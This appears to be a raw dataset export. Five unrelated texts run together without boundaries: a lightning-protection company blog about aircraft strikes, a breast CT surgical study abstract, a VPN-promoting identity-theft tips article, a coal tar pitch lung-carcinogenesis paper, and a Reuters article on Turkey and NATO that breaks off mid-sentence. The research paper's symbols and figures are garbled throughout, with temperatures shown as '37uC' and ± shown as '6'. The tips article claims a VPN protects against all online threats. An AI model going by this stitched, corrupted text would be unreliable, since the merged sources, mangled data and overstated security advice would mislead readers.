content
stringlengths
10
4.9M
Spread the love By: JoOnna Silberman, LightningDiva@Large It’s been said that traveling in an airplane is much safer than driving in a car, but that doesn’t mean aircrafts are not susceptible to damage from electrostatic charges. It has been proven that lightning actually does strike aircrafts, sometimes leaving the aircraft damaged externally and internally. Just recently, minutes before completing a 10+ hour trek from Tokyo, a plane landing at it’s final destination in Los Angeles (LAX) was struck by lightning. It seems that a heavy thunderstorm over Southern California generated the lightning strike of the Delta Airlines Airbus A330-200. The spokesmen for Delta told the LA Times that the passengers neither reported they felt lightning hit the plane nor asked if it occurred. He went on to say that “lightning strikes to planes are rare.” The spokesmen could not have been more wrong. Lightning strikes to airplanes are very common and on average, every airliner will be struck by lightning once a year. Although airplanes can be struck by lightning at any altitude or temperature, research shows that the higher the altitude, the more susceptible a plane is to lightning. It is also interesting to note that 57 percent of the mishaps attributed to lightning strikes to aircraft occur during the months of March through July. In 1962, lighting hit a Pan American Boeing 707 in a holding pattern over Elkton, Maryland. The lightning caused a spark that ignited fuel vapor in a tank, causing an explosion that brought the plane down, killing all 81 aboard. This led to regulations requiring that airplanes have built-in systems that ensure that a spark will not ignite fuel or fuel vapors in tanks or fuel lines. In the 1980s, NASA completed a research project by flying a F-106B jet into 1,154 thunderstorms. It was confirmed that lightning struck the jet 637 times. Although the lightning did not directly damage the plane, it induced small electrical currents that could damage electronic systems. This led to regulations that require aircraft electrical and electronic systems, as well as fuel tanks and lines, to have built-in lightning protection. These two instances prove that lightning can cause both direct and indirect effects to airplanes. Direct effects are caused when lightning strikes attaches to aircraft directly. This can cause extreme heating, which results in melting or burning damage. If lightning were to strike the fuel tank, an explosion or fire could occur. Indirect effects are caused by transient electrical pulses produced by the changing electric and magnetic fields due to the lightning current. These indirect lightning strikes can damage avionics and other systems of the plane. Just like on the ground, lightning poses a serious threat and must be protected against. That is why Lightning Eliminators & Consultants (LEC) is dedicated to providing integrated lightning protection and lightning prevention products, solutions and services by utilizing innovative patented charge transfer technology, grounding systems engineering and testing and surge protection design. Providing comprehensive design, services and consulting, based on state of the art engineering principles and physics LEC has successfully installed and maintained lightning protection systems (LPS) in over 60 countries and throughout the United States for over 40 years. Spread the love
Evaluation of the Usefulness of Breast CT Imaging in Delineating Tumor Extent and Guiding Surgical Management: A Prospective Multi-Institutional Study Objective: The aim of the present study was to evaluate the usefulness of computed tomographic (CT) imaging in delineating tumor extent and guiding surgical management. Background: The routine use of preoperative magnetic resonance imaging (MRI) is a controversial issue in breast cancer management. Negative studies with regard to the utility of MRI might be due to differences in positioning during imaging and subsequent surgery. Methods: Candidates for breast-conserving surgery were eligible for the study. The surgeons marked the line of planned excision on the skin, which was also recorded on the CT image. Contrast-enhanced breast CT was performed in the supine surgical position. The CT results were used to help determine the extent of resection. The pathological findings were then compared with the CT-guided surgical plans. Results: A total of 297 patients were involved. The surgeons widened the extent of resection in 42 (14.1%, 95% confidence interval 10.1%–18.1%) patients on the basis of the CT findings. Among the 6 patients whose procedures were changed to mastectomy, 4 had pathologically multicentric tumors and 2 had widely spread intraductal components. The remaining 36 patients underwent quadrantectomy instead of wide excision on the basis of the CT images. There were 3 patients in whom conversion from wide excision to quadrantectomy resulted in overexcision. Preoperative breast CT may have reduced the positive margin rate and also correctly changed the extent of surgery in 13.1% of patients. Conclusions: This prospective study suggests that breast CT, carried out in the supine position, is useful in the preoperative determination of the optimal surgical procedure.
The present age is the age of technology. Life without the use of technology is impossible. Can you imagine your life without the use of a computer or Smartphones? The answer is no of course. In present times, most of your work is done with the help of computers or smart devices. While carrying out your day-to-day activities, you need to provide your personal information online. That’s true! Human life has become dependent on technology, so provision of security is very important. Whenever you create any account online or carry out some transactions, you always make use of a password. You make the best possible effort to keep the password secure. What if someone hacks your computer/devices? Look into all your valuables and steal everything precious you have? Hackers can crack your password. They can use your valuable data for some unethical and illegal activities. They are not the people to trust. Internet is good, but it is not completely safe. Why? Because every click you made on the Internet leads to becoming a victim of online identity theft. Not familiar with online identity theft? What is Online Identity Theft? Identity theft is one form of crime where hackers and identity snoopers impersonate other individuals identity, such as their personal and finance details, to execute fraudulent activities. Online identity theft is hitting the top list of crimes recorded across the World, and hundreds and thousands of people are becoming the victim of online identity theft. With the word ‘online’, it is clearly identical that this form of crime is concerned with computers and committed through PCs and other Internet-connected devices. Following are the some of the most common online identity thefts recorded during 2015: Stealing your name, email address, and postal address Snatching your passport and driving license details Stealing your login details to get access to private files Bank and other financial details All-in-One Identity Theft Solution We are going to discuss in this post several ways to combat cyber attacks. However, the best solution we tested and experienced is to use a VPN. Why? Because it is one stop shop solution to protect you from all online threats. Below are the best VPN providers that we recommend. How to protect yourself against identity theft It is necessary to ensure your privacy is not breached. It is your right to protect your online identity from any data and financial loss. To protect your identity online, you need to follow these steps to keep your personal information safe and secure online: 1) Click when you are sure Do not click on any unfamiliar link while you are online. This is the golden rule that hackers follow to infect your computer with malware. If you open such links, it is easy for hackers to steal your personal information. 2) Personal means Private, don’t expose it While using any social networking site, make sure that you do not share your personal information with any stranger. The stranger with whom you share your personal information may hack your accounts using the information you provide. This is one of the best proven methods to keep your personal identity safe online 3) Use different passwords Do not reuse password of your main email account. If the hacker cracks the password of your main email account, it is easier for him to reset the passwords of other accounts you use. In this way the hacker gets details about your personal information like your banking or passport details, your date of birth etc. This makes misusing the information easy. 4) Install best antivirus software in your PC Antivirus software protects your PCs from malware. They detect the virus much before you can detect them and hence protect the data from any malicious activities. 5) Install applications like find My iPhone, blackberry protect, or Android lost in your mobile phones Installation of these applications in your mobile phones helps you to erase all the passwords and personal data that you store in your device. This proves very useful if your mobile phone is stolen or lost. 6) Shop online through secure sites only Always remember to shop online through a secure website. How do you know if the site is secure or not? Once you login into the retailers’ site, check if the address changes from “http” to “https”. This change indicates that your connection is secure. After you log in if the address changes to “http” your connection is not secure. Also make sure that you see unbroken key sign in your browser. 7) It is better to ignore the pop-ups Try ignoring pop-ups as much as possible. This is because it may contain malevolent software. If you click on such pop-ups a malware installs into your PC .This poses a threat to your personal identity online. 8) Avoid using public Wi-Fi Using public Wi-Fi is never safe. Safe Wi-Fi hotspots always encrypt the data. In case you use public Wi-Fi that does not encrypt the data, for sure this is the trap of hackers. Never share your passwords using such Wi-Fi connections. 9) Use multiple email accounts It is better if you use separate email accounts for social networking, banking and other financial transactions, shopping and other tasks. This helps you to identify malicious emails and spams. To understand this go through the following example: if you receive a mail about banking in your social networking email, it is spam. Ignore such emails. 10) Never store your credit card details online Breach of data security online is not an easy task, but taking risk is never advisable. Do not share your credit card details on sites that are not secure. It is advisable to make use of disposable credit cards as this reduces the risk of online fraud. 11) Use two-step verification Make sure that you enable two-step verification for your accounts. This helps to keep the data secure. Also no one gets access to any of your accounts without permission. Once someone logs into your account, a verification code is send to you through SMS and when you enter the verification code, only then the account opens. 12) Be vigilant while using auction sites While using auction sites always check the seller feedback before making a deal. Also secure your accounts by changing the passwords after short span of time. This reduces the risks of potential frauds. 13) Always lock your phone or tablet Always keep the data present in your phone secured by passwords. The new generation devices make use of fingerprint technology. This helps secure your data as well as the accounts that you are using. 14) Be cautious while erasing private data Deleting the data from your computer is not a proof that there is no chance of recovery. Certain recovery software’s are also available. This recovery software’s can help in recovery of data which you delete. So to make sure that no recovery is possible, use the software made in particular for this purpose 15) Human error is the reason of online threats Hackers find it easy to hack your computer, tablet or mobile phone if you are careless. Some hackers ask you the private information in an unsuspecting manner. Some use various tricks to get through your personal information. Always be vigilant while sharing your information online. This may be the trap of hackers 16) Use a VPN always Above all the steps we discussed to protect your online identity, this one is our favorite, use a VPN! It helps us in so many different ways. From giving access to geo-restricted websites to saving us from online identity theft, VPN masters in all. Prevention is always better than cure. So, be vigilant while using internet. No doubt, the cyber laws are much strong and online data security softwares are available at ease, but still take precautions while going online. The points given above do not provide the complete solution, but help in reducing online risks to some extent. Besides, your personal identity is secure if you take proper care while going online.
Macrophages Facilitate Coal Tar Pitch Extract-Induced Tumorigenic Transformation of Human Bronchial Epithelial Cells Mediated by NF-κB Objective Chronic respiratory inflammation has been associated with lung cancer. Tumor-associated macrophages (TAMs) play a critical role in the formation of inflammation microenvironment. We sought to characterize the role of TAMs in coal tar pitch extract (CTPE)-induced tumorigenic transformation of human bronchial epithelial cells and the underlying mechanisms. Methods The expression of TAMs-specific CD68 in lung cancer tissues and paired adjacent tissues from cancer patients was determined using immunostaining. Co-culture of human bronchial epithelial cells (BEAS-2B) and macrophage-like THP-1 cells were conducted to evaluate the promotive effect of macrophages on CTPE-induced tumorigenic transformation of BEAS-2B cells. BEAS-2B cells were first treated with 2.4 µg/mL CTPE for 72 hours. After removal of CTPE, the cells were continuously cultured either with or without THP-1 cells and passaged using trypsin-EDTA. Alterations of cell cycle, karyotype, colony formation in soft agar and tumor xenograft growth in nude mice of BEAS-2B cells at passages 10, 20 and 30, indicative of tumorigenecity, were determined, respectively. In addition, mRNA and protein levels of NF-κB in BEAS-2B cells were measured with RT-PCR and western blot, respectively. B(a)P was used as the positive control. Results The over-expression of TAMs-specific CD68 around lung tumor tissues was detected and associated with lung cancer progression. The tumorigenic alterations of BEAS-2B cells including increase in cell growth rate, number of cells with aneuploidy, clonogenicity in soft agar, and tumor size in nude mice in vivo occurred at passage 10, becoming significant at passages 20 and 30 of the co-culture following CTPE removal in compared to BEAS-2B cells alone. In addition, the expression levels of NF-κB in BEAS-2B cells were positively correlated to the malignancy of BEAS-2B cells under different conditions of treatment. Conclusion The presence of macrophages facilitated CTPE-induced tumorigenic transformation of BEAS-2B cells, which may be mediated by NF-κB. Introduction Lung cancer is the leading cause of cancer mortality worldwide , with 1.2 million deaths each year. And there are 1.3 million new cases being diagnosed every year in the world. In China, it is predicted from current epidemiological data that 10 million of people may be diagnosed of lung cancer in 2025. However, the overall 5-year survival rate for lung cancer patients is still less than 15%, which has remained largely stable for the last three decades. Lung carcinogenesis is a complex process, and elucidation of the molecular mechanisms involved in the pathogenesis of lung cancer is expected to help develop novel diagnostic and therapeutic strategies against lung cancer. In 1863 Rudolf Virchow first reported the association of inflammation with cancer . Since then, cancer-related inflammation has been included as a hallmark of carcinogenesis . It has been proposed that tumors were considered as wounds that do not heal because of permanent inflammatory infiltration . Increasing epidemiological evidence has demonstrated that chronic inflammation may play a critical role in lung carcinogenesis . Individuals with chronic inflammatory respiratory diseases, such as chronic obstructive pulmonary disease resulted from smoking exposure , and chronic hypersensitivity pneumonitis were at higher risk for subsequent development of lung cancer. Furthermore, the regular use of aspirin and other non-steroidal anti-inflammatory drugs can reduce the risk of lung cancer, not only in animal, but also in human . However, the mechanisms of inflammation-promoted initiation of lung cancer have not been fully understood. Emerging evidence showed that tumor-associated macrophages (TAMs), derived from circulating monocytic precursors, form a major components in tumor microenvironment. TAMs infiltration has been found in many malignant cancers, such as cervical cancer, colorectal cancer, anaplastic thyroid carcinoma, breast cancer , and lung cancer , which contributes to angiogenesis, lymphargiogenesis, invasion and metastasis. TAMs represent a first line of cells in promoting tumor development because TAMs can release pro-inflammatory cytokines and form tumor microenvironment, which may support tumor growth and help tumor evade immunosurveillance . So far, no evidence has been reported on the role of TAMs in initiation of lung tumor. Coal tar pitch (CTP), the by-product of coal tar incomplete burning and distillation, is used broadly for producing carbon electrode adhesive, waterproof, anti-corrosion coatings and roadconstruction materials. On daily bases, people are exposed to CTP fume. At present, many studies have evaluated the carcinogenic potential of CTP and proved it as a selective inducer of lung cancer. Weyand and coworkers have reported high lung cancer incidence of female A/J mice following 260 days of CTP administration in the diet. Koganti et al. found that an adduct detected in rat lungs 24 hours after administration of dimethylsulfoxide (DMSO) extracted coal tar pitch by i.p. injection for 3 days. In the previous study we have showed that tracheal instillation of 200 mL CTP into rat lungs for 8 times at the concentration of 160 mg/mL, induced lung cancer . CTP is a recognized carcinogen, and CTP-induced lung cancer is one of the serious occupational disorders. Given the long latent period, CTP-induced lung cancer may serve as an excellent model for studying the mechanisms of carcinogenesis. In this study, human bronchial epithelial cells (BEAS-2B) were utilized as the in vitro model to explore the relationship between inflammation and the tumorigenicity induced by coal tar pitch extract. The reason for using bronchial epithelial cells was mainly based on the fact that most lung cancer originates histologically from bronchial epithelial cell. Coal tar pitch extract (CTPE)treated BEAS-2B cells were cultured in the presence or absence of Materials and Methods Preparation of Coal tar pitch extract (CTPE) CTPE was collected as described previously . Briefly, moderate-temperature CTP was grinded into powder in an agate bowl, sieved by 200 mesh sieves and heated at 400uC on the electric hot plate in a flow hood. CTP fume was collected on cellulose ester membrane with 0.8 mm pore size by regular dust sampler and respiratory dust sampler, the particles were collected from diameter 0.8 mm to 2.5 mm. Sampling duration was 100 min with a flow of 10 L/min. After sampling, the filter membranes were cut into pieces, put into flask with stopper and dissolved into 50 mL acetidin (spectroscopically pure), then the solution was vibrated supersonically for 40 min and filtered by sand core funnel, the supernatant was got. Finally a beaker with the supernatant was put in 45uC drying baker, when the liquid was volatilized completely, DMSO (spectroscopically pure) was added to get the extract solution. The stock concentration of CTP extract was 2 mg/mL. Cell Lines, Cell Culture and Tissue Specimens Human bronchial epithelial cell line (BEAS-2B): The BEAS-2B cell line (subclone S6) was obtained from Drs, Curtis Harris and John Lechner (USA National Institutes of Health). It was derived by transforming human bronchial epithelial cells with an adenovirus 12-simian virus 40 construct . Human macro-phage-like cell line (THP-1) was purchased from ATCC (Rockville, USA). The two cell lines were cultured in RPMI 1640 medium with 10% (v:v) of fetal bovine serum (FBS), 100 IU/mL of penicillin and 100 mg/mL of streptomycin. All the cells were cultured at 37uC in a 5% CO 2 incubator. 67 pairs of paraffin-embedded primary lung cancer, their adjacent tumor tissue and surrounding non-tumor lung tissues were collected from patients with lung cancer at the First Affiliated Hospital of Zhengzhou University (Henan, China). Written informed consent was obtained from all 67 subjects. The Life Sciences Institutional Review Board of Zhengzhou University approved the consent procedure. Immunohistochemistry (IHC) Briefly, specimens were deparaffinized, blocked with goat serum for 30 min, and incubated with mouse anti-human CD68 monoclonal antibody (Santa Cruz, 1:10 dilution) overnight at 4uC, then incubated with biotinylated rabbit anti-mouse immnunoglobulin at a concentration of 1:100 at 37uC for 30 min. Positive expression of CD68 IHC was reflected as the brown staining in the cytoplasm and estimated by averaging positively-staining cell numbers under 10 high power vision fields. Determination of CTPE Half Maximal Inhibitory Concentration (IC 50 ) BEAS-2B cells were placed into 24-well plates at a density of 1610 4 per well and treated vehicle control (DMSO), 1, 2.5, 5, 10, 20, 40 and 80 mg/mL of CTPE for 24 h. Then cell viability determined using trypan blue dye exclusion assay. The experiment was repeated three times. And the half maximal inhibitory concentration (IC 50 ) was calculated using Probit regression, which was 8.11 mg/mL. CTP Treatment of Co-culture of BEAS-2B and THP-1 Cells BEAS-2B cells were treated with 2.4 mg/mL CTPE (30% of IC 50 ) for 72 h as follows: BEAS-2B cells grown to 70%-80% confluence were treated with CTPE solution for 24 h. After removal of CTPE, the cells were washed with cold PBS and passaged using trypsin-EDTA; The BEAS-2B cells underwent the same procedure for another two times, total of 72 h. Then, CTPEtreated BEAS-2B cells were co-cultured with THP-1 cells in a ratio of 10:1(BEAS-2B cells/THP-1 cells). B(a)P (5 mg/mL) was used as the positive control and 0.1% DMSO as vehicle control. For simplification, the passage of BEAS-2B cell was numbered as passage 0 following CTPE treatment. Examination of Cell Cycle with Flow Cytometry BEAS-2B cells at passages 10, 20 and 30 were fixed in 70% ethanol prior to propidium iodide staining. DNA content was evaluated by FACS flow-cytometry (Shimadzu, Japan). Karyotyping BEAS-2B cells at passages 10, 20, and 30 in logarithmic phase were treated with 0.04 mg/mL colcemid for 3 h at 37uC to arrest cells in metaphase. Then the cells were trypsinized, centrifuged for 10 min at 1000 rpm, and the cell pellets resuspended in warmed (37uC) KCl hypotonic solution and incubated for 40 min. The swollen cells were pelleted and resuspended in 8 mL of Carnoy's fixation solution (3:1 = methanol: glacial acetic acid) at room temperature for 2 h. The cell suspension was centrifuged and washed twice in fixation solution. After the last centrifugation, the cell was resuspended in 2 mL freshly prepared fixation solution. Three drops of the final cell suspension were placed on clean slides and air-dried. Slides were stained with Giemsa solution (pH 6.8) for 30 min, washed with tap water for 5 seconds, and air-dried. One hundred cells in metaphase were examined for karyotyping (chromosomal abnormality). Colony Formation in Soft Agar Colony formation in soft agar was performed by growing 1610 4 of BEAS-2B cells from passages 10, 20 and 30 in the upper layer (0.7% seaplague) of the two layer agar (0.7% and 1.2%) in a 6-cm dish. After 3 weeks, the number of colony (a colony consisted of more than 50 cells) was counted, and clonogenicity (%) was calculated as number of colony/total growing cell num-ber61000%. RT-PCR Total RNA was isolated from BEAS-2B cells using RNAeasy kit (Invitrogen, Carlsbad, CA, USA) following the manufacturer's protocol. Samples were treated with DNase to remove DNA contamination (Ambion Inc., Austin, TX, USA). RNA samples were then reverse-transcribed into cDNA using SuperScript II RT (Invitrogen Corp., Carlsbad, CA, USA) following the manufacturer's instruction. Primers were designed using Primer 5.0 software and were produced by Shanghai Biological Engineering Company. The sequences are as follows: NF-kB forward: 59-TGCCGAGTGAACCGAAAC-3, reverse 59-TGGAGACACG-CACAGGAGC-39. Gene expression values were normalized to the housekeeping gene GAPDH. PCR reaction contained a total volume of 100 mL containing 1.5 mM magnesium chloride (MgCl 2 ), 200 mM deoxynucleoside triphosphate, 2.5 units Taq DNA polymerase, 20 picomoles of primer, and 100 ng cellular DNA templats. Taq PCR master mix kit was used for PCR reactions (Shanghai Xinbainuo Bio. Co., Shanghai, China). The PCR reaction for NF-kB was performed under the following conditions: 95uC for 2 min, 56uC for 30 s, 72uC for 45 s, for 29 cycles. For GAPDH, PCR condition was 95uC for 2 min, 59uC for 1 min, 72uC for 1 min, for 28 cycles. The two PCR products mixed together and were analyzed by 1.5% agarose gels in TBE buffer. The gels were observed and taken pictures using UV imaging equipment. The gray values were analyzed using Gelpro3.5 software. Western Blotting BEAS-2B cells were lysed with lysis buffer (RIPA lysis buffer with proteinase inhibitors). Protein concentration of cell lysate supernatants was determined with Bradford assay. 20 mg protein was mixed with sample loading buffer and boiled for 5 min. Samples were separated by 10% SDS-PAGE and transferred onto PVDF membranes. Immunoblots were blocked with 5% milk in TBS/0.1% Tween 20 for 1 h at room temperature, then incubated overnight at 4uC with 1:500 rabbit polyclonal antibody against human NF-kB p65 (Santa Cruz) and 1:1000 rabbit polyclonal antibody to human b-actin(Cell Singaling) in 3% milk/ TBS/0.1% Tween 20, 1:2000 goat anti-rabbit IgG (Santa Cruz Biotechnology) as secondary antibody in 3% milk/TBS/0.1% Tween 20 was used to incubate membranes at room temperature for 2 h. Proteins were detected by DAB detection system (Zhongshan Golden Bridge Bio. Co., Beijing China). The densitometry of the bands were analyzed using Gelpro3.5 software. Statistics Data are expressed as mean 6 SEM, GraphPad (SanDiego, CA) were used for statistical analysis. Significant difference among multiple groups with one variant was determined by one-way ANOVA, every two groups were then compared using Newman-Keuls. The Student t test was used for comparisons between two groups. A two-tailed P value ,0.05 was considered statistically significant. Expression of CD68 in Paired Lung Cancer, Adjacent Tumor Tissues and Surrounding Non-tumorous Lung Tissue from Patients CD68 is the specific surface marker of macrophages. As expected, CD68 were mainly detected in cytoplasm of macrophages with brown staining (Figure 1). The number of cell with positive CD68 staining in adjacent lung cancer tissue was 97.4962.54, which was higher than that in lung cancer tissues (11.7861.37) and non-tumorous lung tissues (52.1461.85), and the differences were significant (n = 67, P,0.05). Clinical Implication of CD68 Expression in Adjacent Lung Cancer Tissue The correlation was studied between CD68 high expression in adjacent lung cancer tissue and clinicopathologic characteristics of lung cancer including age, gender, differentiation of tumor cell, metastasis to lymph node, TNM stage and tumor invasion to pleura ( Table 1). It was shown that the number of CD68 positive staining macrophages was closely associated with TNM stage (P = 0.001), metastasis to lymph node (P = 0.001) and tumor invasion to pleura (P = 0.001). Tumorigenic Transformation of BEAS-2B Cells Treated by CTPE The tumorigenicity of BEAS-2B cells treated with DMSO, CTPE, B(a)P, or Co-culture/CTPE was evaluated through examination of cell cycle, karyotype and colony formation in soft agar at passages 10, 20 and 30. Tumorigenicity is characterized of growth promotion, which can be determined using analysis of cell cycle by flow cytometry. As shown in Figure 2, the percentage of the S phase cells at passage 10 increased in CTPE group and Co-culture/CTPE group; At passage 20, the percentage of cells in S phase in Coculture/CTPE group was significantly higher than that of BEAS-2B cells alone exposed to CTPE or B(a)P. At passage 30, the percentage of the S phase cells in the Co-culture/CTPE group remained the highest among all groups. Aneuploidy including hypodiploid (,2n) and hyperdiploid (.2n,,4n) is a common early feature of cancers and has been associated with tumorigenesis and tumor progression. As shown in Figure 3, the number of cells with aneuploidy in total 100 BEAS-2B cells in Co-culture/CTPE group at passage 10 was greater than that of DMSO group, but there was no difference compared to CTPE group. At passage 20 and 30, the rates of cells with aneuploidy in 100 BEAS-2B cells in Co-culture/CTPE group were the highest among these four groups. The results from soft agar assay demonstrated that the number of colony and clongenicity percentage of BEAS-2B cells (Figure 4-5) in co-culture group were not increased at passage 10, but were significantly increased at passage 20, or passage 30 compared to those of other three groups (P,0.05). Tumor Xenograft Growth in Nude Mice Tumor formation in nude mice resembles tumorigenicity in vivo (n = 6/group). BEAS-2B cells without treatment were used as the negative control (blank); BEAS-2B cells treated by DMSO were used as vehicle control. 30 days following cell transplantation, there was no tumor formation in blank, DMSO, or CTPE group at passage 20; However, tumors were observed on the back neck of nude mice transplanted with CTPE-treated BEAS-2B cells of passage 30 (the first tumor was observed on the 15 th day after transplantation), and the mixture of CTPE-treated BEAS-2B cells at passage 30 and THP-1 cells (two tumors were observed on the 10 th day after transplantation) ( Figure 6). Tumor growth curve demonstrated that the average volume of tumors from CTPEinduced passage 30 BEAS-2B/THP-1 cells increased compared to the same passage of BEAS-2B cells alone exposed to CTPE at different observation time points (P,0.05) (Figure 7). Discussion Tumor-associated macrophages (TAMs), which have an M2 macrophage phenotype, are the most abundant immune cells in the tumor microenvironment and play mostly pro-tumoral role. Increased TAMs are frequently , although not always , correlated with a bad prognosis. And there are some reports demonstrating that infiltrating TAMs could promote cancer invasion and metastasis . TAMs infiltrated in breast tumor stroma, not in tumor nest, are positively related to breast tumor metastasis ; Similarly, TAMs infiltrated in the invasive front are associated with improvement in hepatic metastasis in colon cancer ; and TAMs could provide a favorable microenvironment for non-small lung cancer invasion and progression . In this study, we observed that the expression levels of CD68+ TAMs were increased in adjacent lung tumor tissue and correlated with lung cancer progression and metastasis, which was consistent with these observations. In addition, the following studies have also indicated the relationship between TAMs and carcinogenesis. For example, TAMs infiltration was found in a mouse model of pancreatic tumor carcinogenesis induced by the expression of oncogenic Kras G12D . Infiltrating TAMs could produce a proliferation inducing ligand (APRIL) on direct stimulation with Helicobacter pylori (Hp) to promote the initiation of gastric lymphoma . To our knowledge, this study is the first of its kind to show that TAMs can promote lung carcinogenesis. The occurrence and development of cancer involves cell cycle disorganization, leading to an uncontrolled cellular proliferation. . Aneuploidy, a state of abnormal chromosomal number, is a hallmark of human carcinogenesis . Emerging evidence has suggested that aneuploidy is a driver of tumor initiation and growth . Loss of growth inhibition is one of most important characteristic of malignant cells which can be represented as spherical colonies in soft agar in vitro and neoplastic growth in nude mice in vivo . In this study, the tumorigenic function of BEAS-2B cells with or without THP-1 co-culture following CTPE removal was demonstrated by in vitro and in vivo assays. And we identified that TAMs could effectively promote BEAS-2B cell growth, increase number of cells with aneuploidy, increase colony formation of BEAS-2B cells in vitro at 20 th and 30 th passages. A recent study demonstrated that human alveolar macrophages could promote DNA bulky stable adduct formation in human lung epithelial cells exposed with polycyclic aromatic hydrocarbon (PAHs) component of airborne particulate matter (PM(2.5)), the explanation could be that alveolar macrophages could metabolize PAHs of PM2.5 to highly reactive metabolites through induction of Cytochrome P450 (CYP) 1A1 expression and CYP1A1 catalytic activity . Therefore, TAMs not only initiate tumorigenesis by inducing gene mutation and chromosomal rearrangement or amplification, but also form tumor microenvironment and exert their pro-tumoral role by affecting fundamental aspects of tumor biology. For example, they can enhance angiogenesis and lymphangiogenesis , adjust innate and adaptive immunity, and catalyze structural changes of the extracellular matrix (ECM) compartment . In addition to the malignant transformation effect in vitro, THP-1 cells were also shown to enhance tumor formation in nude mice in vivo. The fact that THP-1 cells could not form clone themselves suggested that these cells might promote permanent alterations of the physiologic and social behavior of BEAS-2B cells leading to their insensitivity to growth inhibition by high cell density or low serum concentration. And there was a necrotic area on the surface of tumor derived from the mixed BEAS-2B (passage 30) and THP-1 cells treated with CTPE. It has been proposed that accumulation to necrotic regions of tumor was another prominent hallmark of TAMs , which may be regulated by hypoxia-inducible factor-1 (HIF-1). When inflammation meets cancer, NF-kB works as the matchmaker . NF-kB affects most of the processes of initiation of neoplasia and its malignant progression, through selfsufficiency in growth signals, insensitivity to growth-inhibitory signals, evasion of apoptosis, limitation of replicative potential, tissue invasion and metastasis, and sustained angiogenesis . In a mouse model, Greten et al. specifically knocked out IKK gene in intestinal epithelial cell to inactivate NF-kB, and found the incidence of colitis-associated colorectal cancer was reduced by 80% , which suggested that activation of NF-kB could promote occurrence of colitis-associated colorectal cancer. In addition, there was evidence implicating NF-kB activation mediated pathogen-induced carcinogenesis. Hepatitis B virus X protein induced hepatocellular carcinoma by activating NF-kB ; Human papillomavirus (HPV) has been proposed to promote oral carcinogenesis through activating NF-kB . Furthermore, KRAS mutation was reported to mediate initiation and promotion of endometrial cancer through inducing NF-kB activation . However, there existed inconsistence between the association of NF-kB activation and urethane-induced lung carcinogenesis. For example, one study demonstrated that epithelial NF-kB activation could promotes the initiation of lung cancer by upregulation of anti-apoptosis gene Bcl-2 expression ; In contrary, another study revealed that short-term NF-kB inhibitor, bortezomib might promote lung caicinogenesis, but prolonged NF-kB inhibition could enhance chemical-induced initiation of lung cancer by increased expression of inflammatory cytokine/chemokines, such as interleukin-1b, CXCL1 and CXCL2 . We showed here that the increase in gene transcription of NF-kB was in parallel to its protein levels in BEAS-2B cells co-cultured with THP-1 cells at passages 20 and 30, which were associated with genomic instability and increase in cell-growth and colony formation. Thus, we speculated that there must be a close relationship between activation of NF-kB in malignant cells and lung cancer initiation. To verify this hypothesis, we tested the involvement of NF-kB in this study and found that CTPE could activate NF-kB, and THP-1 could further promote the activity of NF-kB. The possible explanation could be that TAMs could release pro-inflammatory cytokines and participate in the formation of tumor microenvironment. For example, TNF-a and IL-1b secreted from macrophages are not only essential in initiation of chronic inflammation, but also associated with the initiation of cancer by activating NF-kB signal pathway . Activation of NF-kB in tumor cells can produce ROS that further induces DNA damage and genomic instability, leading to the activation of protumorigenic transcription factors, such as STAT3 and AP-1. These transcription factors can promote overexpression of antiapoptosis genes, bcl-x(L) and cell-cycle genes, c-Myc, cyclinD1 , and induce tumor cell abnormal growth. In summary, malignant transformation of BEAS-2B cell induced by CTPE can be an excellent in vitro model to study lung cancer pathogenesis. Tumor-promoting inflammation represents a critical step in lung carcinogenesis: chronic and smoldering inflammation induced by tumor-associated macrophages may precede tumor initiation, creating a favorable microenvironment in which cells with cancer-causing mutations thrive. NF-kB activation, as one of the pillars of inflammation, may have a promoting role in the occurrence of lung cancer. A better understanding of the molecular mechanism at early stage of lung carcinogenesis would provide useful information in establishment of novel preventive and therapeutic strategies for high risk people of lung cancer and lung cancer patients.
ABOARD THE TCG ALEMDAR (Reuters) - In blazing sunlight, two dozen U.S. and Turkish sailors on a NATO exercise lower an American diving bell from an advanced Turkish rescue ship, sending it deep under the Aegean Sea where it is secured to a submarine. U.S. and Turkish sailors prepare a U.S. Navy Submarine Rescue Chamber to dive on board the Turkish Navy's submarine rescue mother ship TCG Alemdar during the Dynamic Monarch-17, a NATO-sponsored submarine escape and rescue exercise, off the Turkish Naval base of Aksaz, Turkey, September 20, 2017. Picture taken September 20, 2017. REUTERS/Murad Sezer Part of a combined NATO rescue simulation this week off Turkey’s southwest coast, the seamless cooperation at sea comes amidst a storm between Ankara and its alliance allies who are concerned about its decades-old commitment to the organization. Under President Tayyip Erdogan, Turkey, with NATO’s second-biggest army, has sought to bolster ties with Russia and Iran. In a clear sign of rapprochement, Ankara is buying a missile defense system from Russia - unnerving NATO officials, who are already wary of Moscow’s military presence in the Middle East, as the system is incompatible with the alliance’s systems. Turkey said it opted for the S-400 anti-aircraft system because Western arms suppliers had not offered a “financially effective” alternative. The Pentagon said it expressed concern to Turkey about the deal. “They went crazy because we made the S-400 agreement. What were we supposed to do, wait for (them)?” Erdogan said recently. “If we have difficulty in obtaining any defense element from some places, if our initiatives are often frustrated by obstacles, what will we do? We will sort it out on our own.” Erdogan’s frustration stems from Washington’s support for the Syrian Kurdish YPG in the fight against Islamic State. Ankara sees the YPG as an extension of the outlawed Kurdistan Workers Party (PKK), which has carried out an insurgency in Turkey’s largely Kurdish southeast and is considered a terrorist organization by the United States and Europe as well as Turkey. ANGERED BY INDICTMENT The president was also angry that U.S. prosecutors charged his former economy minister for conspiring to violate U.S. sanctions on Iran. The indictment marked the first time an ex-government member with close ties to Erdogan had been charged in the investigation that has strained relations between Washington and Ankara. “Part of the reason Erdogan is doing this S-400 deal is he’s angry with the U.S. over the indictment of the former economy minister as well as continued U.S. cooperation with the YPG,” said Soner Cagaptay, a fellow at the Washington Institute think-tank and author of “The New Sultan: Erdogan and the Crisis of Modern Turkey”. “He’s using the S-400 as a lever, in terms of bargaining, to convince Washington to change its mind on a number of issues.” Ties with Europe, especially Germany, were hit by Turkey’s crackdown after last year’s failed coup. Some 150,000 people were purged from the civil service, military and private sector and over 50,000 jailed, including German nationals. Alarmed by what it sees as Ankara’s deteriorating record on human rights, Germany has said it would restrict some arms sales to Turkey. It initially announced a freeze on major arms sales, but scaled that back, citing the fight against Islamic State. Ankara also refused to allow German lawmakers to visit their troops stationed at an air base in Turkey. This has led Germany to move troops involved in the campaign against Islamic State from Turkey’s Incirlik base to Jordan. NOT AN ALTERNATIVE Turkey rejects the idea it is turning away from the West. “The good relations Turkey has developed with Russia are not an alternative to the good relations it has with the West, they complement each other,” Erdogan 